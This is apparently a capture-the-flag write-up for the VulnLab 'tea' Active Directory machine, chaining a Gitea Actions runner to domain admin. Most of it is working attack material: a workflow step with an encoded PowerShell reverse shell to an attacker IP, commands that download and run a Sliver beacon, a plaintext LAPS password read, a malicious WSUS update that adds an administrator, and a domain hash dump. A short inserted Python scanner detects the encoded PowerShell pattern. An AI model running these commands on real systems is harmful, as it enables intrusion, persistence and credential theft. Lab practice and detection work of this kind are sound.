vulnlab-tea
A medium-rated AD chain machine. srv.tea.vl runs a Gitea instance with an active runner; since we can register a user and enable Actions on our own repo, we can execute commands on the runner and get a reverse shell -> Get-LapsADPassword -> SharpWSUS.exe -> domain admin on dc.tea.vl.
Create a .gitea/workflows/demo.yaml file in the repository we created:
http://srv.tea.vl:3000/puck/puck/src/branch/main/.gitea/workflows/demo.yaml
name: Build
run-name: ${{ gitea.actor }} running build job
on: [push]
jobs:
  Explore-Gitea-Actions:
    runs-on: windows-latest
    steps:
      - run: echo "🍏 This job's status is ${{ job.status }}."
      - run: powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADIALgAxADMAOAAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
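From the blue-team side, the thing to catch here is a workflow step that hands PowerShell a base64 blob: the -e argument is base64 of UTF-16LE script text, so a repo scanner can decode it and look for the reverse-shell pattern. The scanner below is an added example, not part of this writeup or of Gitea; the sample workflow, the token list and the 10.0.0.1 address in it are constructed.

```python
import base64
import re

# A "run:" step that launches PowerShell with an encoded command; the alternation covers
# the short forms PowerShell accepts (-e, -ec, -enc, -EncodedCommand).
ENCODED_RE = re.compile(
    r"powershell(?:\.exe)?\b[^\n]*?\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE,
)
# Tokens that rarely belong in a build step but are typical of a reverse shell or stager.
SUSPICIOUS = ("tcpclient", "getstream", "iex", "invoke-expression", "downloadstring")

def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries base64 of the UTF-16LE script text; undo both layers."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")

def encode_command(script: str) -> str:
    """Inverse of decode_encoded_command, used only to build the constructed sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def scan_workflow(text: str) -> list[dict]:
    """One finding per workflow line that runs an encoded PowerShell command."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = ENCODED_RE.search(line)
        if not m:
            continue
        try:
            script = decode_encoded_command(m.group(1))
        except (ValueError, UnicodeDecodeError):
            script = "<undecodable>"  # truncated or non-UTF-16 payload: still worth a look
        low = script.lower()
        findings.append({"line": lineno, "decoded": script,
                         "suspicious": [t for t in SUSPICIOUS if t in low]})
    return findings

# Constructed sample workflow (not the writeup's file): one benign encoded step and one that
# opens a TCPClient and feeds what it reads to iex, the reverse-shell pattern; IP is made up.
BENIGN = encode_command("Get-Date")
SHELLISH = encode_command("$c = New-Object System.Net.Sockets.TCPClient('10.0.0.1',443); iex $x")
SAMPLE_WORKFLOW = f"""name: Build
on: [push]
jobs:
  build:
    runs-on: windows-latest
    steps:
      - run: echo "build started"
      - run: powershell -e {BENIGN}
      - run: powershell -e {SHELLISH}
"""
```

Run it as a pre-receive hook or a CI lint over every file under .gitea/workflows/ and .github/workflows/; an encoded step that decodes to a TCPClient/iex pair is what the writeup's demo.yaml looks like to a reviewer.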
catch with netcat
┌──(puck㉿kali)-[~/vulnlab/tea]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.191.134] 50061
PS C:\Users\thomas.wallace\.cache\act\63805091085fb29f\hostexecutor> whoami
tea\thomas.wallace
download & execute Beacon
PS C:\_install> iwr http://10.8.2.138:8000/beacon.exe -o beacon.exe
PS C:\_install> ./beacon.exe
Sliver
┌──(puck㉿kali)-[~/vulnlab/tea]
└─$ sliver
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

All hackers gain vigilance
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command

sliver > https --lport 8443
[*] Starting HTTPS :8443 listener ...
[*] Successfully started job #1

sliver > jobs
 ID   Name    Protocol   Port   Stage Profile
==== ======= ========== ====== ===============
 1    https   tcp        8443

sliver > generate beacon --seconds 5 --jitter 3 --os windows --arch amd64 --format EXECUTABLE --http 10.8.2.138:8443 --name tea-3 --save /tmp/beacon.exe -G --skip-symbols
[*] Generating new windows/amd64 beacon implant binary (5s)
[!] Symbol obfuscation is disabled
[*] Build completed in 2s
[*] Implant saved to /tmp/beacon.exe

sliver > jobs
 ID   Name    Protocol   Port   Stage Profile
==== ======= ========== ====== ===============
 1    https   tcp        8443

[*] Beacon 9d553a10 tea-3 - 10.10.191.134:50348 (SRV) - windows/amd64 - Tue, 20 Aug 2024 10:25:18 CEST

sliver > use 9d553a10
[*] Active beacon tea-3 (9d553a10-504e-4b41-927f-34a21b1a94bc)

sliver (tea-3) > ls
[*] Tasked beacon tea-3 (2cdcbb9d)
[+] tea-3 completed task 2cdcbb9d

C:\_install (6 items, 24.0 MiB)
===============================
-rw-rw-rw-  beacon.exe                 10.5 MiB   Tue Aug 20 01:16:47 -0700 2024
-rw-rw-rw-  beacon2.exe                10.5 MiB   Tue Aug 20 01:24:56 -0700 2024
-rw-rw-rw-  LAPS.x64.msi               1.1 MiB    Sun Dec 24 06:37:30 -0700 2023
-rw-rw-rw-  LAPS_OperationsGuide.docx  626.3 KiB  Sun Dec 24 06:37:39 -0700 2023
-rw-rw-rw-  PsExec64.exe               813.9 KiB  Sun Oct 22 06:03:38 -0700 2023
-rw-rw-rw-  PsInfo64.exe               523.4 KiB  Sun Dec 24 06:38:30 -0700 2023

sliver (tea-3) > sharp-hound-4 -i -s -t 120 -- -c all,gpolocalgroup
[*] Tasked beacon tea-3 (6338fcbb)
[+] tea-3 completed task 6338fcbb

[*] sharp-hound-4 output:
2024-08-20T01:27:54.2810142-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2024-08-20T01:27:54.9376664-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
--snip--
2024-08-20T01:28:41.7584223-07:00|INFORMATION|Status: 309 objects finished (+309 6.866667)/s -- Using 69 MB RAM
2024-08-20T01:28:41.7687327-07:00|INFORMATION|Enumeration finished in 00:00:45.8844244
2024-08-20T01:28:41.8847345-07:00|INFORMATION|Saving cache with stats: 250 ID to type mappings.
 254 name to SID mappings.
 2 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-08-20T01:28:41.9476974-07:00|INFORMATION|SharpHound Enumeration Completed at 1:28 AM on 8/20/2024! Happy Graphing!
[*] Output saved to /tmp/sharp-hound-4_.3130027413.log

sliver (tea-3) > ls
[*] Tasked beacon tea-3 (3f00e892)
[+] tea-3 completed task 3f00e892

C:\_install (8 items, 24.0 MiB)
===============================
-rw-rw-rw-  20240820012840_BloodHound.zip                          23.2 KiB   Tue Aug 20 01:28:41 -0700 2024
-rw-rw-rw-  beacon.exe                                             10.5 MiB   Tue Aug 20 01:16:47 -0700 2024
-rw-rw-rw-  beacon2.exe                                            10.5 MiB   Tue Aug 20 01:24:56 -0700 2024
-rw-rw-rw-  LAPS.x64.msi                                           1.1 MiB    Sun Dec 24 06:37:30 -0700 2023
-rw-rw-rw-  LAPS_OperationsGuide.docx                              626.3 KiB  Sun Dec 24 06:37:39 -0700 2023
-rw-rw-rw-  NjdkNDliNTgtOWQ5Mi00ZTViLWI2NzctOWJlODE4OTM4ZGMy.bin   42.8 KiB   Tue Aug 20 01:28:41 -0700 2024
-rw-rw-rw-  PsExec64.exe                                           813.9 KiB  Sun Oct 22 06:03:38 -0700 2023
-rw-rw-rw-  PsInfo64.exe                                           523.4 KiB  Sun Dec 24 06:38:30 -0700 2023

sliver (tea-3) > download 20240820012840_BloodHound.zip
[*] Tasked beacon tea-3 (d8c023fe)
[+] tea-3 completed task d8c023fe
[*] Wrote 23731 bytes (1 file successfully, 0 files unsuccessfully) to /home/puck/vulnlab/tea/20240820012840_BloodHound.zip

sliver (tea-3) >
sliver (tea-3) > interactive
[*] Using beacon's active C2 endpoint: https://10.8.2.138:8443
[*] Tasked beacon tea-3 (d48d0ac7)
[*] Session 67a7541b tea-3 - 10.10.163.246:53086 (SRV) - windows/amd64 - Thu, 22 Aug 2024 09:21:51 CEST

sliver (tea-3) > use 67a7541b-db54-4c92-a36a-b6baec828a14
[*] Active session tea-3 (67a7541b-db54-4c92-a36a-b6baec828a14)

sliver (tea-3) > shell
? This action is bad OPSEC, are you an adult? Yes
[*] Wait approximately 10 seconds after exit, and press <enter> to continue
[*] Opening shell tunnel (EOF to exit) ...
[*] Started remote shell with pid 4600

PS C:\_install> Get-LAPSADPassword -Identity SRV -AsPlainText

ComputerName        : SRV
DistinguishedName   : CN=SRV,OU=Servers,DC=tea,DC=vl
Account             : Administrator
Password            : %t50Z))o4+0Z;6
PasswordUpdateTime  : 8/21/2024 11:53:03 PM
ExpirationTimestamp : 9/20/2024 11:53:03 PM
Source              : EncryptedPassword
DecryptionStatus    : Success
AuthorizedDecryptor : TEA\Server Administration

PS C:\_install>
netexec winrm srv.tea.vl -u administrator -p 'rr<redacted>S9' --local
WINRM   10.10.191.134   5985   SRV   [*] Windows Server 2022 Build 20348 (name:SRV) (domain:tea.vl)
WINRM   10.10.191.134   5985   SRV   [+] SRV\administrator:rr<redacted>S9 (Pwn3d!)
evil-winrm -i srv.tea.vl -u administrator -p 'rr<redacted>S9'
or
xfreerdp /u:Administrator /p:rr<redacted>S9 /w:1566 /h:968 /v:srv.tea.vl:3389
Not finished yet. Next, fetch SharpWSUS onto SRV:
iwr http://10.8.2.138:8000/SharpWSUS.exe -o sharpwsus.exe
SharpWSUS
sharpwsus locate
sharpwsus inspect
sharpwsus create /payload:"C:\Users\Administrator\Documents\psexec64.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user puck Password123! /add && net localgroup administrators puck /add \"" /title:"Great UpdateC21" /date:2024-08-23 /kb:700123 /rating:Important /description:"Really important update" /url:"https://google.com"
sharpwsus approve /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl /groupname:"Awesome Group C2"
sharpwsus check /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl
sharpwsus delete /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl /groupname:"Awesome Group C2"
C:\_install>sharpwsus create /payload:"C:\Users\Administrator\Documents\psexec64.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user puck Password123! /add && net localgroup administrators puck /add \"" /title:"Great UpdateC21"

 Phil Keeble @ Nettitude Red Team

[*] Action: Create Update
C:\WSUS-Updates\WsusContent
[*] Creating patch to use the following:
[*] Payload: psexec64.exe
[*] Payload Path: C:\Users\Administrator\Documents\psexec64.exe
[*] Arguments: -accepteula -s -d cmd.exe /c \net
[*] Arguments (HTML Encoded): -accepteula -s -d cmd.exe /c \net

################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
SRV, 8530, C:\WSUS-Updates\WsusContent

ImportUpdate
Update Revision ID: 198781
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 198782
PrepareXMLBundletoClient
DeploymentRevision

[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN /groupname:"Group Name"
[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN
[*] To delete the update use the following command:
[*] SharpWSUS.exe delete /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN /groupname:"Group Name"
[*] Create complete
There is no such global user or group: puck.
There is no such global user or group: " /title:Great.
There is no such global user or group: UpdateC21.
More help is available by typing NET HELPMSG 3783.
C:\_install>SharpWSUS.exe approve /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:dc.tea.vl /groupname:"Group1"

 Phil Keeble @ Nettitude Red Team

[*] Action: Approve Update
C:\WSUS-Updates\WsusContent
Targeting dc.tea.vl
TargetComputer, ComputerID, TargetID
------------------------------------
dc.tea.vl, 216d99cd-2257-41e7-9687-2163fb7e39f7, 1
Group Exists = False
Group Created: Group1
Added Computer To Group
Approved Update
[*] Approve complete

C:\_install>
┌──(puck㉿kali)-[~/vulnlab]
└─$ netexec smb dc.tea.vl -u puckie -p 'Start123!'
SMB   10.10.145.21   445   DC   [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tea.vl) (signing:True) (SMBv1:False)
SMB   10.10.145.21   445   DC   [+] tea.vl\puckie:Start123! (Pwn3d!)
Finally
xfreerdp /u:puckie /p:'Start123!' /w:1566 /h:968 /v:dc.tea.vl:3389
catch the hashes
impacket-secretsdump 'tea/puckie:Start123!@dc.tea.vl' > allhashes.txt
This was super fun.